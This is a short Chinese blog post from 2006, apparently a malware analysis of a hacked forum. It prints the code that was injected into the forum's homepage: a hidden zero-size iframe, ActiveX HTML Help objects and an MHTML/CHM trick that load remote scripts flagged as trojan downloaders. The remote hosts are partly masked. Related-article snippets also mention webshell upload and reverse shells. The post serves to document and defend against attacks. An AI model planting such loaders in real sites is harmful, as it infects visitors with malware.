一个被挂上木马的论坛

最新推荐文章于 2019-06-20 19:56:50 发布
最新推荐文章于 2019-06-20 19:56:50 发布
阅读量365 收藏
点赞数
文章标签: javascript php ViewUI

endurer 原创

2006-07-21 第1

论坛首页被加入:
------------------
<iframe src="hxxp://msbyl***.***go1.icpcn.com/" width="0" height="0" frameborder="0"></iframe>
------------------

hxxp://msbyl***.***go1.icpcn.com/的代码为:
------------------
<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://msbyl***.***go1.icpcn.com/bbs003302.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML>
<html>
<iframe src="hxxp://msby***.go***1.icpcn.com/" width="0" height="0" frameborder="0"></iframe>
</html>
<script src='hxxp://s52.cnzz.com/stat.php?id=202256&web_id=202256&online=1&show=line' language='JavaScript' charset='gb2312'></script>
----------------

bbs003302.gif Kaspersky报为:exploit.VBS.Phel.m
bbs003302.css Kaspersky报为:Trojan-Downloader.Win32.Tiny.cj


hxxp://msby***.go***1.icpcn.com/的代码为:
----------------
<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:/.mht!hxxp://msby***.go***1.icpcn.com/help.txt::/%23%2E%68%74m"></OBJECT>
<script src='hxxp://s53.cnzz.com/stat.php?id=204586&web_id=204586&online=1&show=line' language='JavaScript' charset='gb2312'></script>
----------------

help.txt 其实是一个CHM文件,Kaspersky报为:Trojan-Downloader.Win32.Tiny.cj

iteye_6637
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
操作123456
qq_65648226的博客
04-28 3381
1.拼音缩写函数 DELIMITER $$ USE `mpos`$$ CREATE FUNCTION `mysql`.`pysx`( wz VARCHAR(20)) RETURNS VARCHAR(20) CHARSET utf8 BEGIN SET @i=1; SET @mcsx=''; SET @len=CHAR_LENGTH(wz); WHILE(@i<=@len) DO S...
防范ASP木马的十大基本原则
可爱是名词吗?
11-07 763
 由于ASP它本身是服务器提供的一贡服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求.   几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇
3个网站被上的木马出自一家
Purpleendurer@CSDN
09-18 1876
endurer 原创2006-09-18 第1版第1个网站 首页被加入的的代码:/-------<iframe src=htxxp://www.***.why***all.com/1 width=0 height=0 frameborder=0></iframe>-------/1.htm  内容为加入多余空格的VBScript脚本代码。(瑞星报为: Trojan.DL
公司网站被木马处理过程
Akay的Web技术博客
03-22 1766
2010年3月22日早上8:45左右发现公司的www.jinshiqi.net网站被木马。症状:打开时网页出现错位和乱码,360浏览器提示有木马。查看源码发现页面源码的最后部分被加上了一段js外部调用的代码。用FTP连接到网站空间,发现被马的页面文件更新日期还是一两个月以前的,没有修改。解决:赶紧把备份的源文件替换上去,再访问,一切正常。疑问:网站只有一个html页面,黑客是怎么入
网站被黑入侵被马跳转如何解决?
热门推荐
网站安全专家
06-03 1万+
昨天,发现客户的公司官网被黑了,标题是正常的,点击进去却跳转到了博彩网站。这里记录一下,我的解决方法。(不一定适用每一个网站)首先是主页在百度排名的显示情况,如下图被修改之后(百度更新也太及时了,上午发现的下午就更新了。):为什么明明标题被修改,但是在上面显示的还是之前我们自己设置的?主要是加入了以下的代码:我测试了一下,大家可以看看:而后被修改的标题是经过编码转换放入的:我的解决措施:1、修改f...
discuz论坛注入木马
小刚的博客
06-20 4637
今天试了一下很牛逼的一套流程 对discuz论坛马,利用菜刀上传webshell,并反向shell获取控制权,最后更改文件权限。 虽然是我看众多视频学来的,但很多知识还是挺有用的,今天就结合一下,搞一波我的虚拟机。 实验环境: VM搭建的虚拟测试环境 1.centos7安装的discuzs3.3论坛http://10.10.10.64/upload/forum.php 2.kali 10.10....
php网站被木马后的修复方法总结
10-25
主要介绍了php网站被木马后的修复方法,总结分析了Linux与Windows系统上木马的查杀方法,并给出了一个完整的木马查找工具实例,需要的朋友可以参考下
ASP网站中数据库被木马的解决方案
10-23
我们在用ASP连接数据库开发应用程序时,可能会遇到ASP数据库被木马的情况,本文我们就介绍了ASP数据库被木马时的编程处理方法,希望会对您有所帮助。
网站数据库被js木马.pdf
12-18
网站数据库被JS木马是一种常见的网络安全威胁,主要表现为攻击者通过注入JavaScript代码来控制或影响网站的行为。这种攻击方式通常利用SQL注入漏洞,使得恶意脚本能够在网页中执行,进而影响用户浏览器,甚至窃取...
某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
Purpleendurer@CSDN
04-30 2085
endurer 原创2007-04-30 第1版该网站的留言板页面:/---<Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"></iframe>---/被植入代码:/---<iframe src
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
Purpleendurer@CSDN
04-12 1845
endurer 原创2007-04-12 第1版网页被加入代码:/-----<iframe src=hxxp://www.xa**it*an.cn/mm/mm.htm width=0 height=0></iframe>---/mm.htm包含代码:/---<iframe src=hxxp://www.97***72*5.com/?01***6 width=0 height=0></ifr
pe_xscan优化了几处代码
Purpleendurer@CSDN
09-14 1260
1、优化了O24组的检测代码 2、优化了几个底层函数代码
mplayer
shaowei的博客
10-01 2509
最基本的播放命令 mplayer music.mp3 就可以播放music.mp3这个音频了、视频也是如此 mplayer /home/test/Music/* 这个就是播放Music目录下的所有音乐,是按一定顺序播放的。 mplayer /home/test/Music/* -shuffle 这个是播放Music目录下的所有音乐,但是后面加的那个参数是随机播放的。 ...
8 款实用的 jQuery 插件及源码
10-18 478
jQuery的确是一款非常轻巧强大的JS框架,相信每一位Web开发者都非常喜欢。许多jQuery插件不仅开源,而且代码和设计都十分优雅,对自己的JS开发能力也会有很大提高。下面分享8款实用jQuery插件及源码,希望对大家有所帮助。  1、jQuery动感的图片滑动动画  款实用的 jQuery 插件及源码" TITLE="8 款实用的 jQuery 插件及源码" />
调用qq的方法
larance的挨踢生活
06-23 787
调用qq的方法: target=blank> border=0> 调用msn的方法: 点这里和我MSN聊天 放在页面上就能出效果了! 1.如何在网页上显示腾讯QQ在线洽谈?QQ在线咨询代码(qq在线交谈代码/qq在线客服代码/qq在线状态代码/qq在线客服代码) (将123456换成你的号码,site后面换成你的网站就可以了)更多的生成显示QQ在线状态的代码,请查看腾讯官方网站 http://i
OO系统分析员之路--用例分析系列(2)--用例的类型与粒度
CrazyLive的专栏
04-25 1392
=========================================================== OO系统分析员之路--用例分析系列(2)--用例的类型与粒度作者: coffeewoo(http://coffeewoo.itpub.net)发表于: 2006.03.03 23:48分类: 系统分析、设计,UML及OO , 出处: http://coffeewoo.itpub.
用html写一个旋转木马
最新发布
05-20
这是一个基本的旋转木马,它使用 CSS 过渡效果和 JavaScript 来实现轮播。在 HTML 中,我们创建了一个包含图像的 div 元素,并将其包装在一个具有 carousel 类的 div 元素中。然后,我们使用 CSS 将其设置为相对定位...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值